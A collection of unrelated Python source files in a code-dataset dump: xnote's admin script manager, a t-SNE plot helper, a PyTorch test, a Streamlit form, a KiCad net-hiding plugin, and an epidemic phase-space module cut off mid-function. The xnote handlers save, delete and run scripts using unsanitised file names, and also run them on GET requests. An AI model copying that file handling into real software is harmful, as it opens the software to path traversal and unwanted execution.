model\n\t\n\t\n\t\n\t\n\t\n\t","repo_name":"sofiienko/WeedSegmentation","sub_path":"Server/Unet.py","file_name":"Unet.py","file_ext":"py","file_size_in_byte":9557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"25108727093","text":"# encoding=utf-8\r\n# Created by xupingmao on 2017/05/24\r\n# 系统脚本管理\r\nfrom __future__ import print_function\r\nimport os\r\nimport sys\r\nimport gc\r\nimport web\r\nimport xauth\r\nimport xutils\r\nimport xconfig\r\nimport xtemplate\r\nfrom xutils import u\r\nfrom xutils import six\r\n\r\nSCRIPT_EXT_LIST = (\r\n \".bat\", \r\n \".vbs\", \r\n \".sh\", \r\n \".command\",\r\n \".py\"\r\n)\r\n\r\ntemplate_file = \"system/page/script.html\"\r\n\r\ndef get_default_shell_ext():\r\n if 
xutils.is_mac():\r\n return \".command\"\r\n elif xutils.is_windows():\r\n return \".bat\"\r\n return \".sh\"\r\n\r\ndef get_script_path(name):\r\n return os.path.join(xconfig.SCRIPTS_DIR, name)\r\n\r\ndef get_script_list():\r\n \"\"\"获取脚本列表\"\"\"\r\n dirname = xconfig.SCRIPTS_DIR\r\n shell_list = []\r\n if os.path.exists(dirname):\r\n for fname in os.listdir(dirname):\r\n fpath = os.path.join(dirname, fname)\r\n if os.path.isfile(fpath) and fpath.endswith(SCRIPT_EXT_LIST):\r\n shell_list.append(fname)\r\n return sorted(shell_list)\r\n\r\nclass SaveHandler:\r\n\r\n @xauth.login_required(\"admin\")\r\n def POST(self):\r\n name = xutils.get_argument(\"name\")\r\n content = xutils.get_argument(\"content\")\r\n dirname = xconfig.SCRIPTS_DIR\r\n path = os.path.join(dirname, name)\r\n content = content.replace(\"\\r\", \"\")\r\n xutils.savetofile(path, content)\r\n raise web.seeother(\"/system/script/edit?name=\"+xutils.quote(name))\r\n\r\nclass DeleteHandler:\r\n\r\n @xauth.login_required(\"admin\")\r\n def POST(self):\r\n name = xutils.get_argument(\"name\")\r\n dirname = xconfig.SCRIPTS_DIR\r\n path = os.path.join(dirname, name)\r\n os.remove(path)\r\n raise web.seeother(\"/system/script\")\r\n\r\nclass ExecuteHandler:\r\n\r\n @xauth.login_required(\"admin\")\r\n def GET(self):\r\n return self.POST()\r\n\r\n @xauth.login_required(\"admin\")\r\n def POST(self):\r\n name = xutils.get_argument(\"name\")\r\n content = xutils.get_argument(\"content\")\r\n arg_path = xutils.get_argument(\"path\")\r\n if content != \"\" and content != None:\r\n dirname = xconfig.SCRIPTS_DIR\r\n path = os.path.join(dirname, name)\r\n content = content.replace(\"\\r\", \"\")\r\n old_content = xutils.readfile(path)\r\n if old_content != content:\r\n xutils.savetofile(path, content)\r\n # 必须调用exec_script因为可能没有保存过程\r\n ret = xutils.exec_script(name, vars = dict(path=arg_path))\r\n return dict(code=\"success\", message=\"\", data=ret)\r\n\r\nclass SearchHandler:\r\n\r\n 
@xauth.login_required(\"admin\")\r\n def GET(self):\r\n name = xutils.get_argument(\"name\", \"\")\r\n list = [x for x in get_script_list() if x.find(name) >= 0]\r\n return xtemplate.render(template_file, shell_list = list, name=name)\r\n\r\nclass ListHandler:\r\n\r\n @xauth.login_required(\"admin\")\r\n def GET(self):\r\n op = xutils.get_argument(\"op\")\r\n name = xutils.get_argument(\"name\", \"\")\r\n error = xutils.get_argument(\"error\", \"\")\r\n dirname = xconfig.SCRIPTS_DIR\r\n\r\n content = \"\"\r\n if op == \"edit\":\r\n content = xutils.readfile(os.path.join(dirname, name))\r\n if op == \"add\" and name != \"\":\r\n path = os.path.join(dirname, name)\r\n basename, ext = os.path.splitext(name)\r\n if ext not in SCRIPT_EXT_LIST:\r\n name = basename + get_default_shell_ext()\r\n path = os.path.join(dirname, name)\r\n if os.path.exists(path):\r\n raise web.seeother(xutils.quote_unicode(\"/system/script_admin?error=%r已存在\" % name))\r\n xutils.touch(path)\r\n\r\n shell_list = get_script_list()\r\n return xtemplate.render(template_file, \r\n op = op,\r\n name = name,\r\n content = content,\r\n shell_list = shell_list,\r\n error = error)\r\n\r\n @xauth.login_required(\"admin\")\r\n def POST(self):\r\n op = xutils.get_argument(\"op\")\r\n name = xutils.get_argument(\"name\", \"\")\r\n dirname = xconfig.SCRIPTS_DIR\r\n path = os.path.join(dirname, name)\r\n # print(op, name)\r\n basename, ext = os.path.splitext(name)\r\n if op == \"add\" and name != \"\":\r\n if ext not in SCRIPT_EXT_LIST:\r\n name = basename + get_default_shell_ext()\r\n path = os.path.join(dirname, name)\r\n if os.path.exists(path):\r\n raise web.seeother(xutils.quote_unicode(\"/system/script_admin?error=%r已存在\" % name))\r\n with open(path, \"wb\") as fp:\r\n pass\r\n elif op == \"save\":\r\n content = xutils.get_argument(\"content\")\r\n content.replace(\"\\r\", \"\")\r\n xutils.savetofile(path, content)\r\n raise web.seeother(\"/system/script_admin\")\r\n\r\nclass EditHandler:\r\n\r\n 
@xauth.login_required(\"admin\")\r\n def GET(self):\r\n op = xutils.get_argument(\"op\")\r\n name = xutils.get_argument(\"name\", \"\")\r\n error = xutils.get_argument(\"error\", \"\")\r\n dirname = xconfig.SCRIPTS_DIR\r\n\r\n path = os.path.join(dirname, name)\r\n if not os.path.exists(path):\r\n content = \"\"\r\n else:\r\n content = xutils.readfile(path)\r\n\r\n return xtemplate.render(template_file, \r\n op = \"edit\",\r\n name = name,\r\n content = content,\r\n shell_list = [],\r\n error = error)\r\n\r\nclass RenameHandler:\r\n\r\n @xauth.login_required(\"admin\")\r\n def POST(self):\r\n oldname = xutils.get_argument(\"oldname\")\r\n newname = xutils.get_argument(\"newname\")\r\n oldpath = get_script_path(oldname)\r\n newpath = get_script_path(newname)\r\n if not os.path.exists(oldpath):\r\n return dict(code=\"fail\", message=\"源文件不存在\")\r\n if os.path.exists(newpath):\r\n return dict(code=\"fail\", message=\"目标文件已存在\")\r\n try:\r\n os.rename(oldpath, newpath)\r\n return dict(code=\"success\")\r\n except Exception as e:\r\n return dict(code=\"fail\", message=str(e))\r\n\r\nxurls = (\r\n r\"/system/script\", ListHandler,\r\n r\"/system/script_admin\", ListHandler,\r\n\r\n r\"/system/script/search\", SearchHandler,\r\n\r\n r\"/system/script_admin/edit\", EditHandler,\r\n r\"/system/script/edit\", EditHandler,\r\n \r\n r\"/system/script_admin/save\", SaveHandler,\r\n r\"/system/script/save\", SaveHandler,\r\n\r\n r\"/system/script_admin/execute\", ExecuteHandler,\r\n r\"/system/script/execute\", ExecuteHandler,\r\n\r\n r\"/system/script_admin/delete\", DeleteHandler,\r\n r\"/system/script/delete\", DeleteHandler,\r\n r\"/system/script/rename\", RenameHandler,\r\n)\r\n\r\n\r\n","repo_name":"xupingmao/xnote","sub_path":"handlers/system/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":6736,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"33"} +{"seq_id":"74275574493","text":"import numpy as 
np\nfrom sklearn.manifold import TSNE\n\ndef plot_embedding(data, label, title):\n x_min, x_max = np.min(data, 0), np.max(data, 0)\n data = (data - x_min) / (x_max - x_min)\n fig = plt.figure()\n #ax = plt.subplot(111)\n for i in range(data.shape[0]):\n plt.text(data[i, 0], data[i, 1], str(label[i]),\n color=plt.cm.Set1((label[i] + 1) / 10.),\n fontdict={'weight': 'bold', 'size': 9})\n plt.xticks([])\n plt.yticks([])\n plt.title(title)\n return fig\n\n\n\ndef tnse():\n output, tSNE_features = model_T(features, adj_T)\n print(\"Generating T-SNE...\")\n tsne = TSNE(n_components=2, init='pca', random_state=0)\n tSNE_result = tsne.fit_transform(tSNE_features.data.cpu().numpy())\n tSNE_label = labels.data.cpu().numpy()\n fig = plot_embedding(tSNE_result, tSNE_label,\n 't-SNE embedding of Cora'\n )\n plt.show(fig)","repo_name":"jarvisWang0903/Utils","sub_path":"tnse.py","file_name":"tnse.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"21031539740","text":"import torch\nimport torch.nn as nn\n\nconv2d_1 = nn.Conv2d(in_channels=3, out_channels=3, kernel_size=3, stride=2, padding=1)\nconv2d_2 = nn.Conv2d(in_channels=3, out_channels=3, kernel_size=3, stride=2, padding=1)\nx = torch.randn((1, 3, 200, 100))\n\ny = conv2d_1(x)\ny = conv2d_2(y)\n\nprint(y.shape)\n\n\nleakyReLU = torch.nn.LeakyReLU(0.02)\ny = leakyReLU(-torch.ones((2,1)))\nprint(y)\n","repo_name":"ZhangYong19800721/SuperResolution","sub_path":"SR_CycleWGAN/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"3660015129","text":"import streamlit as st\r\n\r\n\r\nst.title(\"Neural Lab Internal Categorization Testing API\")\r\n\r\nm_form = st.form(key = 'form1')\r\n\r\ntitle = m_form.text_input(\"Enter the Title of Article\")\r\n\r\nbody = m_form.text_area(\"Enter the Body of 
Article\")\r\n\r\nsubmit = m_form.form_submit_button(label = \"Get Categories\")\r\n\r\nif submit:\r\n st.subheader(\"dasdasd\")","repo_name":"qasidali861/qasid","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74664283013","text":"from pcbnew import *\n\nimport sys\nimport os\nimport os.path\nimport re\nimport wx\nimport wx.aui\nimport wx.lib.filebrowsebutton as FBB\n\nWIDGET_SPACING = 5\n\n\noriginal_netlist = {}\nhidden_nets = list()\n\n\ndef get_netlist():\n \"\"\"Create a dict with part ref & pad num as the key and attached net as the value.\"\"\"\n netlist = {}\n for pad in GetBoard().GetPads():\n pad_key = pad.GetParent().GetReference(), pad.GetPadName()\n netlist[pad_key] = pad.GetNetname(), pad.GetNetCode(), pad.IsConnected()\n return netlist\n\n\ndef get_net_names():\n \"\"\"Create a list of all the net names in the PCB.\"\"\"\n return list(set([net[0] for net in get_netlist().values()]))\n\nclass LabelledListBox(wx.BoxSizer):\n \"\"\"ListBox with label.\"\"\"\n\n def __init__(self, parent, label, choices, tooltip=\"\"):\n wx.BoxSizer.__init__(self, wx.HORIZONTAL)\n self.lbl = wx.StaticText(parent=parent, label=label)\n self.lbx = wx.ListBox(\n parent=parent,\n choices=choices,\n style = wx.LB_MULTIPLE | wx.LB_NEEDED_SB | wx.LB_SORT,\n )\n self.lbx.SetToolTip(wx.ToolTip(tooltip))\n self.AddSpacer(WIDGET_SPACING)\n self.Add(self.lbl, 0, wx.ALL | wx.ALIGN_TOP)\n self.AddSpacer(WIDGET_SPACING)\n self.Add(self.lbx, 1, wx.ALL | wx.EXPAND)\n self.AddSpacer(WIDGET_SPACING)\n\n def GetList(self):\n rv = list()\n for i in self.lbx.GetSelections():\n rv.append(self.lbx.GetString(i))\n print(rv)\n return rv\n\n\nclass NetNameDialog(wx.Dialog):\n \"\"\"Class for getting a new net name from the user.\"\"\"\n\n def __init__(self, *args, **kwargs):\n wx.Dialog.__init__(self, None, title=kwargs.get(\"title\"))\n\n panel = 
wx.Panel(self)\n\n self.name_field = LabelledListBox(\n panel, \"Net Name:\", kwargs.get(\"net_name_choices\"), kwargs.get(\"tool_tip\")\n )\n\n self.ok_btn = wx.Button(panel, label=\"OK\")\n self.cancel_btn = wx.Button(panel, label=\"Cancel\")\n self.ok_btn.Bind(wx.EVT_BUTTON, self.set_net_name, self.ok_btn)\n self.cancel_btn.Bind(wx.EVT_BUTTON, self.cancel, self.cancel_btn)\n\n btn_sizer = wx.BoxSizer(wx.HORIZONTAL)\n btn_sizer.AddSpacer(WIDGET_SPACING)\n btn_sizer.Add(self.ok_btn, flag=wx.ALL | wx.ALIGN_CENTER)\n btn_sizer.AddSpacer(WIDGET_SPACING)\n btn_sizer.Add(self.cancel_btn, flag=wx.ALL | wx.ALIGN_CENTER)\n btn_sizer.AddSpacer(WIDGET_SPACING)\n\n # Create a vertical sizer to hold everything in the panel.\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(self.name_field, 0, wx.ALL | wx.EXPAND, WIDGET_SPACING)\n sizer.Add(btn_sizer, 0, wx.ALL | wx.ALIGN_CENTER, WIDGET_SPACING)\n\n # Size the panel.\n panel.SetSizer(sizer)\n panel.Layout()\n panel.Fit()\n\n # Finally, size the frame that holds the panel.\n self.Fit()\n\n # Show the dialog box.\n self.ShowModal()\n\n def set_net_name(self, evt):\n self.netlist = self.name_field.GetList()\n self.Close()\n\n def cancel(self, evt):\n self.netlist = list()\n self.Close()\n\n def GetList(self):\n return self.netlist\n\n\n\n\ndef hide_net_callback(evt):\n \"\"\"Hide a Net.\"\"\"\n allnets=get_net_names()\n allnets.remove('')\n net_names = NetNameDialog(\n title=\"Attach Pads to New or Existing Net\",\n tool_tip=\"Type or select name for the net to connect these pads.\",\n net_name_choices=allnets,\n edit=False,\n )\n\n for netname in net_names.GetList():\n brd = GetBoard()\n cnct = brd.GetConnectivity()\n for pad in brd.GetPads():\n if pad.GetNetname() == netname:\n cnct.Remove(pad)\n pad.SetNetCode(0)\n hidden_nets.append(netname)\n\n # Update the board to show the removed connections.\n brd.BuildListOfNets()\n cnct.RecalculateRatsnest()\n Refresh()\n\n\ndef show_net_callback(evt):\n \"\"\"Show a previously hidden 
net.\"\"\"\n if len(hidden_nets) <= 0:\n return\n\n net_names = NetNameDialog(\n title=\"Attach Pads to New or Existing Net\",\n tool_tip=\"Type or select name for the net to connect these pads.\",\n net_name_choices=hidden_nets,\n edit=False,\n )\n\n for netname in net_names.GetList():\n # Get the selected pads.\n brd = GetBoard()\n cnct = brd.GetConnectivity()\n for pad in brd.GetPads():\n pad_key = pad.GetParent().GetReference(), pad.GetPadName()\n if original_netlist[pad_key][0] == netname:\n cnct.Add(pad)\n pad.SetNetCode(original_netlist[pad_key][1])\n hidden_nets.remove(netname)\n\n # Update the board to show the removed connections.\n brd.BuildListOfNets()\n cnct.RecalculateRatsnest()\n Refresh()\n\n\ndef show_all_nets_callback(evt):\n \"\"\"Show all hidden Nets.\"\"\"\n if len(hidden_nets) <= 0:\n return\n\n # Get the selected pads.\n brd = GetBoard()\n cnct = brd.GetConnectivity()\n for pad in brd.GetPads():\n pad_key = pad.GetParent().GetReference(), pad.GetPadName()\n if original_netlist[pad_key][0] in hidden_nets:\n cnct.Add(pad)\n pad.SetNetCode(original_netlist[pad_key][1])\n\n # Update the board to show the removed connections.\n brd.BuildListOfNets()\n cnct.RecalculateRatsnest()\n Refresh()\n hidden_nets.clear()\n\n\n\n\n\nclass ShowHideNets(ActionPlugin):\n \"\"\"Plugin class for tools to change wiring between pads\"\"\"\n\n buttons = False # Buttons currently not installed in toolbar.\n\n def defaults(self):\n self.name = \"ShowHideNets\"\n self.category = \"Layout\"\n self.description = \"Show/Hide complete nets/airwires.\"\n self.icon_file_name = os.path.join(os.path.dirname(__file__), 'show_hide_net.png')\n\n def Run(self):\n\n # Add Wire-It buttons to toolbar if they aren't there already.\n if not self.buttons:\n\n def findPcbnewWindow():\n \"\"\"Find the window for the PCBNEW application.\"\"\"\n windows = wx.GetTopLevelWindows()\n pcbnew = [w for w in windows if \"Pcbnew\" in w.GetTitle()]\n if len(pcbnew) != 1:\n raise Exception(\"Cannot 
find pcbnew window from title matching!\")\n return pcbnew[0]\n\n try:\n # Find the toolbar in the PCBNEW window.\n import inspect\n import os\n\n filename = inspect.getframeinfo(inspect.currentframe()).filename\n path = os.path.dirname(os.path.abspath(filename))\n pcbwin = findPcbnewWindow()\n top_toolbar = pcbwin.FindWindowById(ID_H_TOOLBAR+1)\n\n # Add wire-creation button to toolbar.\n hide_button = wx.NewId()\n hide_button_bm = wx.Bitmap(\n os.path.join(os.path.dirname(__file__), \"hide.png\"),\n wx.BITMAP_TYPE_PNG,\n )\n top_toolbar.AddTool(\n hide_button,\n \"Hide\",\n hide_button_bm,\n \"Hide a Net\",\n wx.ITEM_NORMAL,\n )\n top_toolbar.Bind(wx.EVT_TOOL, hide_net_callback, id=hide_button)\n\n # Add wire-removal button.\n show_button = wx.NewId()\n show_button_bm = wx.Bitmap(\n os.path.join(os.path.dirname(__file__), \"show.png\"), wx.BITMAP_TYPE_PNG\n )\n top_toolbar.AddTool(\n show_button,\n \"Show Net\",\n show_button_bm,\n \"Show a previously hidden net\",\n wx.ITEM_NORMAL,\n )\n top_toolbar.Bind(wx.EVT_TOOL, show_net_callback, id=show_button)\n\n # Add pad-swap button.\n show_all_button = wx.NewId()\n show_all_button_bm = wx.Bitmap(\n os.path.join(os.path.dirname(__file__),\"show_all.png\"),\n wx.BITMAP_TYPE_PNG,\n )\n top_toolbar.AddTool(\n show_all_button,\n \"Show all Nets\",\n show_all_button_bm,\n \"Show all hidden Nets\",\n wx.ITEM_NORMAL,\n )\n top_toolbar.Bind(wx.EVT_TOOL, show_all_nets_callback, id=show_all_button)\n\n top_toolbar.Realize()\n\n self.buttons = True # Buttons now installed in toolbar.\n\n # Also, store the current netlist to compare against later when dumping wiring changes.\n global original_netlist\n original_netlist = get_netlist()\n\n except Exception as e:\n debug_dialog(\"Something went wrong!\", 
e)\n\n","repo_name":"alterratz/ShowHideNets","sub_path":"ShowHideNets.py","file_name":"ShowHideNets.py","file_ext":"py","file_size_in_byte":8891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5497198961","text":"import math\nimport numpy as np\nfrom src import gen_extinct_prob, manatee\n\n\"\"\"\nFor use, call compute_phase_space from outside file with associated parameters to obtain and save\nmatrix files of the s,m phase space for each generation specified.\n\"\"\"\n\ndef compute_extinct_prob_all(deg_dist=None, T=1.0, n_gens=20, renorm=True, fft = True, custom_g0=None, custom_g1=None):\n if deg_dist is not None:\n psi = Psi(deg_dist, initProb=1, num_gens=n_gens, max_s=len(deg_dist), max_m=len(deg_dist), initial_T=T)\n else:\n psi = Psi(deg_dist, initProb=1, num_gens=n_gens, initial_T=T, custom_g0=custom_g0, custom_g1=custom_g1,\n max_m=len(custom_g1), max_s=len(custom_g1))\n# =============================================================================\n# for g in range(n_gens):\n# psi[g][:,0] = np.zeros(psi.shape[0])\n# psi[g] = psi[g]/np.sum(psi[g])\n# =============================================================================\n if renorm:\n for g in range(n_gens):\n for s in range(psi.shape[1]):\n if np.sum(psi[g][s][:]) > 0:\n psi[g][s,0] = 0\n psi[g][s,:] = psi[g][s,:] / np.sum(psi[g][s,:])\n if deg_dist is None:\n deg_dist = custom_g1 # this is just for computing the extinction prob\n extct_array = gen_extinct_prob.gen_ext_prob_array(psi, deg_dist, T, fft=fft, custom=True)\n else:\n extct_array = gen_extinct_prob.gen_ext_prob_array(psi, deg_dist, T, fft=fft)\n return [extct_array, psi]\n\ndef expected_num_infected(deg_dist, T):\n d_len = len(deg_dist)\n psi = Psi(deg_dist, initProb=1, num_gens=50, max_s=d_len, max_m=d_len, initial_T=T)\n expected_cum_array = np.zeros(50)\n for gen in range(50):\n psi[gen][:,0] = np.zeros(d_len)\n psi[gen] = psi[gen]/np.sum(psi[gen])\n inverted_s_m = 
psi[gen]\n ps_g_analytical = np.sum(inverted_s_m, axis=0)\n ps_g_analytical = ps_g_analytical / np.sum(ps_g_analytical)\n expected_cum_array[gen] = np.sum(ps_g_analytical * np.arange(len(ps_g_analytical)))\n np.savetxt(f'./../data/expected_cum_{T}_m.txt', expected_cum_array)\n print(expected_cum_array[:10])\n\n# CALL FROM OUTSIDE CLASS CALLS HERE\ndef compute_phase_space(num_gens, num_nodes, degree_distribution, transmissibility,\n save_results=True, gens_to_save=None,\n file_fmt_to_save='phase_space/generation_{0}', intervention_gen=-1, intervention_trans=None,\n vacc_pop=.5, rollout_dict=None,\n do_non_interv=True, do_interv=True, intervention_type=\"none\", pre_vax_correction=False):\n \"\"\"\n Computes and saves a matrix for each generation of the s,m phase space\n :param num_gens: Number of generations to compute til\n :param num_nodes: Number of nodes in the network. Should match the length of the passed degree_distribution\n :param degree_distribution: Vector or list of length num_nodes.\n :param transmissibility: Original transmission paramter T\n :param save_results: boolean, will save files to directory and format in file_fmt_to_save. Must specify dyamic arg param for generation, {0}.\n :param gens_to_save: Which generations to save a file for\n :param file_fmt_to_save: Directory and file name pattern, with arg for gen number, such as my_files/generation_{0}\n :param intervention_gen: FOR SINGLE, UNIVERSAL INTERVENTION ONLY: Generation of intervention\n :param intervention_trans: FOR SINGLE, UNIVERSAL INTERVENTION ONLY: Transmissiblity change at intervention\n :param vacc_pop: FOR SINGLE, UNIVERSAL INTERVENTION ONLY: population vaccinated at intervention\n :param rollout_dict: Non-cumulative dict of generations and their vaccination percentages, e.g. {3: .05, 4: .01, 5:.02}\n :param do_non_interv: boolean. Will run non-intervention case on same degree distribution and transmissibility.\n :param do_interv: boolean. 
Will run intervention model.\n :param intervention_type: string. Specify universal, random_rollout, or targeted_rollout\n :param pre_vax_correction: IGNORE, DO NOT USE\n :return:\n \"\"\"\n # the generating function for psi gen g (prob of having s infected by the end of gen g of which m became infected during gen g\n initProb = 1\n\n if do_non_interv:\n all_psi_results = Psi(degree_distribution, initProb, num_gens, num_nodes, num_nodes, transmissibility)\n\n if save_results:\n try:\n for gen in gens_to_save:\n if gen < num_gens:\n np.savetxt(file_fmt_to_save.format(gen) + '.txt', all_psi_results[gen], delimiter=',')\n except Exception:\n print('Must provide gens_to_save in arguments as list')\n else:\n all_psi_results = np.zeros((2, 2))\n\n if do_interv:\n all_psi_results_with_intervention = Psi(degree_distribution, initProb, num_gens, num_nodes, num_nodes,\n transmissibility, intervention_gen, intervention_trans, vacc_pop,\n rollout_dict, intervention_type, pre_vax_correction=pre_vax_correction)\n if save_results:\n try:\n for gen in gens_to_save:\n np.savetxt(file_fmt_to_save.format(gen) + '_intv.txt', all_psi_results_with_intervention[gen],\n delimiter=',')\n except Exception:\n print('Must provide gens_to_save in arguments as list')\n else:\n all_psi_results_with_intervention = np.zeros((2, 2))\n return all_psi_results, all_psi_results_with_intervention\n\n\ndef pdf_of(degree_list):\n if np.sum(degree_list) == 0:\n return np.array(degree_list)\n g0 = np.zeros(len(degree_list))\n for i in range(len(g0)):\n g0[i] = degree_list[i] / np.sum(degree_list)\n return g0\n\n\ndef z1_of(g_0):\n z1 = 0\n for k in range(len(g_0)):\n z1 += (k * g_0[k])\n return z1\n\n\ndef g1_of(g_0):\n g_1 = np.zeros(len(g_0))\n for k in range(len(g_0) - 1):\n g_1[k] = (k + 1) * g_0[k + 1]\n if np.sum(g_0) == 0:\n return g_1\n return g_1 / (z1_of(g_0))\n\ndef g_g_of(g_gminus1, deltas, g): # Different derivation than the g1_of function since we need to incorporate the deltas.\n g_g = 
np.zeros(len(g_gminus1))\n denom = np.zeros(len(g_gminus1))\n\n for k in range(len(g_gminus1) - 1):\n g_g[k] = k * (k+1) * (1 - deltas[g][k+1]) * g_gminus1[k + 1]\n denom[k] = (k + 1) * (1 - deltas[g][k+1]) * g_gminus1[k + 1]\n if np.sum(denom) == 0:\n return g_g\n return g_g / np.sum(denom)\n\n\n\ndef phase_space(g_0, g_1, g=10):\n Psi_sm = np.zeros((10, 100, 100))\n # Initial condition:\n Psi_sm[0][1][1] = 1\n return Psi_sm\n\n\ndef gen_functions_with_transmissibility(degree_distrb, T):\n # Given a degree distribution for G0 (or the degree distribution of the entire network).\n # Given transmissibility T\n maxk = len(degree_distrb)\n p_k = degree_distrb\n\n # This is the matrix of k x l resulting p l given k in each cell\n p_LK = np.zeros((maxk, maxk))\n\n # Generates pgf in variable l as probabilities of infection of l neighbors given the original degree distribution and transmission prob T\n for k in range(0, maxk):\n # somewhere here have another matrix that's l by j\n # construct that for each p_j_given_l (whatever the order is)\n for l in range(0, k + 1):\n try:\n # this will be some operation of this with the vector for the particular l\n # sum over all j for this particular l\n p_LgivenK = p_k[k] * (\n math.gamma(k + 1) / (math.gamma(l + 1) * math.gamma(k - l + 1)) * T ** (l) * (1 - T) ** (k - l))\n p_LK[k][l] = p_LgivenK\n except OverflowError:\n p_LK[k][l] = 0\n p_l = np.sum(p_LK, axis=0)\n if np.sum(p_l) != 0:\n p_l = p_l / (np.sum(p_l))\n\n G0_with_T = pdf_of(p_l)\n G1_with_T = g1_of(G0_with_T)\n return G1_with_T, G0_with_T\n\n\ndef critical_degree_calc(prop, degree_d, delta_k, g): # This function is the change\n k_crit = len(degree_d) #default for the critical k value\n temp_prop = prop\n while temp_prop > 0:\n temp_prop = temp_prop - degree_d[k_crit-1]\n delta_k[g][k_crit-1] = 1.0\n k_crit -= 1\n\n delta_k[g][k_crit] = (-temp_prop) * degree_d[k_crit]\n\n return k_crit, -temp_prop, delta_k\n\ndef constructMatrixM(g_0, g_1):\n # Constructs the matrix 
of pgfs for G0_with transmission convolved to every mth power\n N_0 = len(g_0)\n N_1 = len(g_1)\n M_0 = np.zeros((N_0, N_0))\n M_1 = np.zeros((N_1, N_1))\n\n M_0[1] = g_0\n newDist = g_1\n M_1[1] = newDist\n for row in range(2, N_1):\n second_convol = convolve_with_ifft(newDist, g_1)\n M_1[row] = second_convol\n newDist = M_1[row]\n\n M_1[0][0] = 1 #nice\n return (M_0, M_1)\n\n\ndef computeLittlePsi(s, m, prevGenPsi, M):\n s_prime = s - m\n newPsi = prevGenPsi[s_prime, :].dot(M[:, m])\n return newPsi\n\ndef offspring_dists(r0, k, p0, length):\n a = 1/k\n g1 = np.zeros(length)\n g0 = np.zeros(length)\n for i in range(len(g1)):\n try:\n # fact = np.sqrt(2 * math.pi * i) * (i / np.exp(1)) ** i\n g1[i] = (math.gamma(i + k) / (math.factorial(i) * math.gamma(k))) * ((a * r0) / (1 + a * r0)) ** (i) * (\n 1 / (1 + a * r0)) ** (k)\n except OverflowError:\n g1[i] = 0\n g1 = g1 / np.sum(g1)\n g0 = compute_g0_from_offspring(g1, p0)\n g0 = g0[:-1]\n return g0, g1\n\ndef compute_g0_from_offspring(g1, p0):\n g0 = np.zeros(len(g1)+1)\n for i in range(1, len(g0)):\n g0[i] = g1[i-1]/i\n g0 = g0 / np.sum(g0)\n g0[0] = p0\n g0[1:] = g0[1:]*(1-p0)\n return g0\n\n\n\n# COMPUTATION STARTS HERE\ndef Psi(degree_distrb=None, initProb=1, num_gens=400, max_s=400, max_m=400, initial_T=0.8,\n intervention_gen=-1, intervention_T=0.5,\n prop_vacc=0.5, rollout_dict=None, intervention_type=\"none\",\n custom_g0=None, custom_g1=None, pre_vax_correction=False):\n # 3-d matrix with one matrix per generation of Psi_g\n allPsi = np.zeros(((num_gens, max_s, max_m)))\n allPsi[0][1][1] = initProb\n\n # Assign initial degree distribution here\n if custom_g0 is None and custom_g1 is None:\n original_degree_distrb = degree_distrb\n g1, g0 = gen_functions_with_transmissibility(original_degree_distrb,\n initial_T) # this g0 and g1 is for the G(1-(xy+1)T) in terms of the l's\n elif custom_g0 is None or custom_g1 is None:\n print('PLEASE PROVIDE BOTH CUSTOM G1 AND CUSTOM G0')\n else:\n g0 = custom_g0 # Custom g0 
and g1 set if using a distribution for secondary cases (such as a negative binomial) and not the original network degree distribution\n g1 = custom_g1\n\n M_0, M_1 = constructMatrixM(g0, g1)\n\n if intervention_type==\"none\":\n allPsi = baseline(num_gens, max_s, max_m, allPsi, M_1, M_0)\n\n if intervention_type==\"universal\":\n allPsi = universal_intervention(num_gens, max_s, max_m, original_degree_distrb, intervention_gen, intervention_T, initial_T, allPsi, g0, M_1, M_0, pre_vax_correction)\n\n elif intervention_type==\"random_rollout\":\n allPsi = random_rollout_intervention(num_gens, max_s, max_m, original_degree_distrb, initial_T, allPsi, g0, M_1, M_0, rollout_dict, pre_vax_correction)\n\n elif intervention_type==\"random\":\n print('PLEASE USE RANDOM ROLLOUT')\n # allPsi = random_intervention(num_gens, max_s, max_m, original_degree_distrb, intervention_gen, prop_vacc, initial_T, allPsi, g0, M_1, M_0, pre_vax_correction)\n\n elif intervention_type==\"targeted\":\n print('PLEASE USE TARGETED ROLLOUT')\n # allPsi = targeted_intervention(num_gens, max_s, max_m, original_degree_distrb, intervention_gen, prop_vacc, initial_T, allPsi, g0, M_1, M_0, pre_vax_correction)\n\n elif intervention_type==\"targeted_rollout\":\n allPsi = targeted_rollout_intervention(num_gens, max_s, max_m, original_degree_distrb, initial_T, allPsi, g0, M_1, M_0, rollout_dict, pre_vax_correction)\n\n else:\n print(f\"Specified an unrecognized intervention type of {intervention_type}, please specify one of universal, random, targeted, random_rollout or targeted_rollout\")\n\n return allPsi\n\ndef baseline(num_gens, max_s, max_m, allPsi, M_1, M_0):\n for g in range(1, num_gens):\n M = M_1\n if g == 1:\n M = M_0\n print('working on gen ' + str(g))\n for s in range(max_s):\n for m in range(0, s):\n allPsi[g][s][m] = computeLittlePsi(s, m, allPsi[g - 1], M)\n psi_g = allPsi[g]\n psi_g = psi_g / np.sum(psi_g)\n allPsi[g] = psi_g\n return allPsi\n\ndef universal_intervention(num_gens, max_s, max_m, 
